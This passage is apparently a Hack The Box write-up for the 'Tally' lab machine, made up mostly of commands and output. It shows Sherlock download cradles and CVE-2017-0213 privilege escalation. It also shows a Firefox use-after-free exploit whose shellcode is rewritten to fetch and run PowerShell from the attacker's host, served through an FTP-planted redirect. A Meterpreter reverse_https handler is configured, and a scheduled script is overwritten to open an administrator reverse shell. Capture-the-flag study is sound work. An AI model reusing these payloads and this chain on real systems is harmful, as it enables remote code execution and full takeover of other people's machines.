Auth result: 0
Return code: 0
Last error: 0
..
..
..
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $nc -lnvp 9004
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9004
Ncat: Listening on 0.0.0.0:9004
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:51918.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
==================================================================================================================================

EXTRA CONTENT
We can also solve the box in different ways. We can download sherlock in order to be able to look for local privilege escalation 
on the box.
Commands and Output:
==================================================================================================================================
sudo git clone https://github.com/rasta-mouse/Sherlock.git
==================================================================================================================================

We can then download it locally on the box, itself.
Commands and Output:
==================================================================================================================================
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.20/Sherlock.ps1')
Find-AllVulns
==================================================================================================================================

Commands and Output:
==================================================================================================================================
Find-AllVulns


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Supported on single-core systems

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
==================================================================================================================================

We don't find much but we can google windows github exploit.
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits

We have a bunch of proof of concepts.
Commands and Output:
==================================================================================================================================
systeminfo

Host Name:                 TALLY
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30726-67778-AA877
Original Install Date:     28/08/2017, 15:43:34
System Boot Time:          25/05/2021, 00:21:39
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 166 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 876 MB
Virtual Memory: In Use:    3,219 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB.LOCAL
Logon Server:              \\TALLY
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4015217
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.59
                                 [02]: fe80::7c72:f3f3:7eb8:a73a
                                 [03]: dead:beef::7c72:f3f3:7eb8:a73a
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
==================================================================================================================================

Last hotfix installed "KB4015217" let's us know when was the last time the machine was patched.

And based on google search of the hotfix it was in April 11, 2017
https://support.microsoft.com/en-us/topic/april-11-2017-kb4015217-os-build-14393-1066-and-14393-1083-b5f79067-98bd-b4ec-8b81-5d858d7dc722

We come to find a cve that was published in May 2017 which was CVE-2017-0213, you can find more info in
https://nvd.nist.gov/vuln/detail/CVE-2017-0213

This let's us know that the exploit should be able to work since it was released after the latest patch in april.
Exploit is past pacth update.

Next going to a windows box and downloading visual studio code for c++, once installed the follwoing steps are required.
Commands and Output:
==================================================================================================================================
cd "c:\:Program Files (x86)"
cd "Microsoft Visual Studio <tab>"
cd "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build"
cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build>vcvarsall.bat amd64
cd VC
vcvars64.bat amd64 
cl
cl CVE-2017-0213.cpp /EHsc /DUNICODE /D_UNICODE
==================================================================================================================================

The solution for using this privesc requires an interactive process such as "iexplore" in order to get that to work you need to get
a meterpeter shell so that you could migrate your current non interactive process to an interactive one with migrate and PID of 
the process. 

Current version of Visual Studio does not work with the "#include bits/stdc++.h" so the binary may not be compiled will most likely
need the pre-compiled binary to get it to work.

You can grab a copy in the following web page.

https://github.com/vaclaviklluk/Exploits/tree/master/CVE-2017-0213/Binaries
Commands and Output:
==================================================================================================================================
==================================================================================================================================


An alternative to getting user on the box which can be done through a firefox exploit, the exploit comes from a firefox
vilnerability where an old version of firefox is installed on the server. This was grabbed through the ftp user.
Commands and Output:
==================================================================================================================================
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-31-17  11:51PM       <DIR>          From-Custodian
10-01-17  11:37PM       <DIR>          Intranet
08-28-17  06:56PM       <DIR>          Logs
09-15-17  09:30PM       <DIR>          To-Upload
09-17-17  09:27PM       <DIR>          User
226 Transfer complete.
ftp> cd Intranet
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
09-11-17  10:25PM       <DIR>          Binaries
226 Transfer complete.
ftp> cd Binaries
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
08-30-17  10:38PM             43046456 Firefox Setup 44.0.2.exe
226 Transfer complete.
==================================================================================================================================

We can searchsploit, for firefox exploits. We find many but the main one we want to focus on is the html tree builder.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $searchsploit firefox | grep 424
Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)                         | windows/remote/42484.html
==================================================================================================================================

The technique for this relies on a user hitting the server itself. So what we can do since we have upload rights through ftp
is modify the index.html so that when a user hits our webage it will have the web broswer of the user go to our maclicious web
page that contains our exploit code.

So we write some html that we will upload via ftp that will redirect to our own http server.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $cat ffexploit.html 
<html>
        <meta http-equiv="refresh" content="0; URL='http://10.10.14.20/ffexploit.html'" />
</html>
==================================================================================================================================

We can upload via ftp and setup a web browser.
Commands and Output:
==================================================================================================================================
ftp> put index.html 
local: index.html remote: index.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
109 bytes sent in 0.00 secs (3.2485 MB/s)

..
..
..

┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $sudo python -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.59 - - [25/May/2021 10:29:40] code 404, message File not found
10.10.10.59 - - [25/May/2021 10:29:40] "GET /ffexploit.html HTTP/1.1" 404 -
10.10.10.59 - - [25/May/2021 10:29:40] code 404, message File not found
10.10.10.59 - - [25/May/2021 10:29:40] "GET /favicon.ico HTTP/1.1" 404 -
10.10.10.59 - - [25/May/2021 10:29:40] code 404, message File not found

..
..
..


==================================================================================================================================

Now we have to look at the exploit we will try to run, by default the exploit is just trying run a pop of calc.exe, we will want 
to modify the exploit to instead run powershell and execute a maclious payload we will generate to trick the server into running.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $cat 42484.html 
<!doctype html>
<html>
<head>
<meta http-equiv="cache-control" content="no-cache" charset="utf-8" />
<title>CVE-2016-1960</title>
<script>

..
..
..

/* This is executed after having pivoted the stack.  `esp' points to a
 * region on the heap, and the original stack pointer is stored in
 * `edi'.  In order to bypass EMET, the shellcode should make sure to
 * xchg edi, esp before any protected function is called.
 *
 * For convenience, the first two "arguments" to the shellcode is a
 * module handle for kernel32.dll and the address of GetProcAddress() */
const shellcode = [
    "\x8b\x84\x24\x04\x00\x00\x00", /* mov eax, dword [esp + 0x4] */
    "\x8b\x8c\x24\x08\x00\x00\x00", /* mov ecx, dword [esp + 0x8] */
    "\x87\xe7",                     /* xchg edi, esp */
    "\x56",                         /* push esi */
    "\x57",                         /* push edi */
    "\x89\xc6",                     /* mov esi, eax */
    "\x89\xcf",                     /* mov edi, ecx */
    "\x68\x78\x65\x63\x00",         /* push xec\0 */
    "\x68\x57\x69\x6e\x45",         /* push WinE */
    "\x54",                         /* push esp */
    "\x56",                         /* push esi */
    "\xff\xd7",                     /* call edi */
    "\x83\xc4\x08",                 /* add esp, 0x8 */

    "\x6a\x00",                     /* push 0 */
    "\x68\x2e\x65\x78\x65",         /* push .exe */
    "\x68\x63\x61\x6c\x63",         /* push calc */
    "\x89\xe1",                     /* mov ecx, esp */
    "\x6a\x01",                     /* push 1 */
    "\x51",                         /* push ecx */
    "\xff\xd0",                     /* call eax */
    "\x83\xc4\x0c",                 /* add esp, 0xc */

    "\x5f",                         /* pop edi */
    "\x5e",                         /* pop esi */
    "\x87\xe7",                     /* xchg edi, esp */
    "\xc3",                         /* ret */
];

..
..
..

==================================================================================================================================

We first have to convert the command we want the remote machine to into hex, this can be accomplished through python. We need to print 
in reverse since the the stack is first in last out.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $python2
Python 2.7.18 (default, Apr 28 2021, 17:39:59) 
[GCC 10.2.1 20210110] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> cmd = "powershell(IEX(IWR('http://10.10.14.20/mf.ps1'))"
>>> for i in range(len(cmd), 0, -4):
...     print cmd[i-4:i]
... 
1'))
f.ps
20/m
.14.
0.10
://1
http
WR('
EX(I
ll(I
rshe
powe

..
..
..
==================================================================================================================================

Now that we have the plain text for every for characters we can convert the plain text into hex via the following in python.
Commands and Output:
==================================================================================================================================
>>> for i in range(len(cmd), 0, -4):
...     print cmd[i-4:i].encode('hex')
... 
31272929
662e7073
32302f6d
2e31342e
302e3130
3a2f2f31
68747470
57522827
45582849
6c6c2849
72736865
706f7765
==================================================================================================================================

We can now take the output and convert into hex format, this can be done via vim and using a macro to do it for every to 2 bytes 
'\x'. To us a macro simply hit "q (AND) a" while in escape mode and perform the different modfications you need and hit escape and 
q to exit the macro piece. To replicate the macro simply hit "@ (AND) a" to replicate the same modifications.
Commands and Output:
==================================================================================================================================
\x31\x27\x29\x29
\x66\x2e\x70\x73
\x32\x30\x2f\x6d
\x2e\x31\x34\x2e
\x30\x2e\x31\x30
\x3a\x2f\x2f\x31
\x68\x74\x74\x70
\x57\x52\x28\x27
\x45\x58\x28\x49
\x6c\x6c\x28\x49
\x72\x73\x68\x65
\x70\x6f\x77\x65

==================================================================================================================================

Now all we need to do is replace the calc.exe with our exploit code.
Commands and Output:
==================================================================================================================================
    "\x31\x27\x29\x29",  
    "\x66\x2e\x70\x73", 
    "\x32\x30\x2f\x6d", 
    "\x2e\x31\x34\x2e", 
    "\x30\x2e\x31\x30", 
    "\x3a\x2f\x2f\x31", 
    "\x68\x74\x74\x70", 
    "\x57\x52\x28\x27", 
    "\x45\x58\x28\x49", 
    "\x6c\x6c\x28\x49", 
    "\x72\x73\x68\x65", 
    "\x70\x6f\x77\x65", 
==================================================================================================================================

Once the calc.exe payload is modified with our powershell hex instead we can, now copy the exploit into ffexploit.html so that the 
web browser and can run it. We also make sure our handler is up and running
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $cp unicorn/powershell_attack.txt www/mf.ps1
..
..
..

┌─[user@parrot-virtual]─[~/htb/tally/unicorn]
└──╼ $sudo msfconsole -r unicorn.rc
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.0.44-dev                          ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post       ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services

[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (unicorn.rc)> set LHOST 10.10.14.20
LHOST => 10.10.14.20
resource (unicorn.rc)> set LPORT 443
LPORT => 443
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (unicorn.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (unicorn.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.14.20:443

msf6 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_https  https://10.10.14.20:443

..
..
..

┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $mv 42484.html ffexploit.html

..
..
..

┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $sudo python -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.59 - - [25/May/2021 11:12:23] code 404, message File not found
10.10.10.59 - - [25/May/2021 11:12:23] "GET /ffexploit.html HTTP/1.1" 404 -

==================================================================================================================================

And we wait for the exploit to execute. Since the creator of the box created a batch file under sarah browser.bat that 
automatcally kills the firefox process, this makes the exploit harder to execute.
Commands and Output:
==================================================================================================================================
10.10.10.59 - - [25/May/2021 11:29:10] "GET /ffexploit.html?continue=77571776 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:10] code 404, message File not found
10.10.10.59 - - [25/May/2021 11:29:10] "GET /favicon.ico HTTP/1.1" 404 -
10.10.10.59 - - [25/May/2021 11:29:10] code 404, message File not found
10.10.10.59 - - [25/May/2021 11:29:10] "GET /favicon.ico HTTP/1.1" 404 -
10.10.10.59 - - [25/May/2021 11:29:10] "GET /ffexploit.html?continue=143632064 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:11] "GET /ffexploit.html?continue=209692352 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:12] "GET /ffexploit.html?continue=275752640 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:13] "GET /ffexploit.html?continue=341812928 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:14] "GET /ffexploit.html?continue=407873216 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:15] "GET /ffexploit.html?continue=11515584 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:16] "GET /ffexploit.html?continue=77575872 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:16] "GET /ffexploit.html?continue=143636160 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:18] "GET /ffexploit.html?continue=209696448 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:19] "GET /ffexploit.html?continue=275756736 HTTP/1.1" 200 -
10.10.10.59 - - [25/May/2021 11:29:20] "GET /ffexploit.html?continue=341817024 HTTP/1.1" 200 -
..
..
..
  File "/usr/lib/python3.9/socket.py", line 704, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer

==================================================================================================================================

We see that the connection is killed by the user making the exploit not run, one way to stop this from happening is killing the
interactive cmd process being run by the sarah user so that the browser.bat does not kill the firefox proccess being ran.

You would need to get a shell on the box, look at the boxes ad kill any interactive "1" cmd processes. If ping stops that means the 
correct cmd was killed.
Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================


Meanwhile if we had edited correctly the SPWarmUp.ps1 file with the following anfd waited an hour we would have gotten an admin
shell baclk as the following
Commands and Output:
==================================================================================================================================
echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.20/rev-9002.ps1')" > SPBestWarmUp.ps1
cat SPBestWarmUp.ps1
IEX(New-Object Net.webClient).DownloadString('http://10.10.14.20/rev-9002.ps1')

..
..
..

┌─[✗]─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $sudo !!
sudo python -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.59 - - [24/May/2021 16:39:47] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.59 - - [24/May/2021 16:43:03] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.59 - - [24/May/2021 16:50:19] "GET /Sherlock.ps1 HTTP/1.1" 200 -
10.10.10.59 - - [24/May/2021 16:57:42] "GET /rev-9002.ps1 HTTP/1.1" 200 -

..
..
..

┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $rlwrap nc -lnvp 9002
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49885.
Windows PowerShell running as user Administrator on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami

tally\administrator
PS C:\Users\Sarah\Desktop>
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================

Commands and Output:
==================================================================================================================================
==================================================================================================================================
